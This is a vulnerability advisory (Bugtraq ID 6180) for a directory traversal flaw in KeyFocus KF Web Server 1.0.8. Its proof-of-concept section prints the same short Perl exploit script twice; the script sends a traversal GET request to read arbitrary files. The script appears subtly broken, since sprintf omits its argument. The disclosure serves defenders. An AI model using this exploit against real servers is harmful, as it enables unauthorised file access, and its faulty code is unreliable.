KeyFocus KF Web Server Directory Traversal Vulnerability
BID:6180
Info
KeyFocus KF Web Server Directory Traversal Vulnerability
| Bugtraq ID: | 6180 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 13 2002 12:00AM |
| Updated: | Nov 13 2002 12:00AM |
| Credit: | Discovery is credited to [email protected] <[email protected]>. |
| Vulnerable: |
KeyFocus KF Web Server 1.0.8 |
| Not Vulnerable: |
KeyFocus KF Web Server 2.0 .0 beta |
Exploit / POC
KeyFocus KF Web Server Directory Traversal Vulnerability
The following proof of concept script was provided by [email protected] <[email protected]>:
#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}
The following proof of concept script was provided by [email protected] <[email protected]>:
#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}
References
KeyFocus KF Web Server Directory Traversal Vulnerability
References:
References: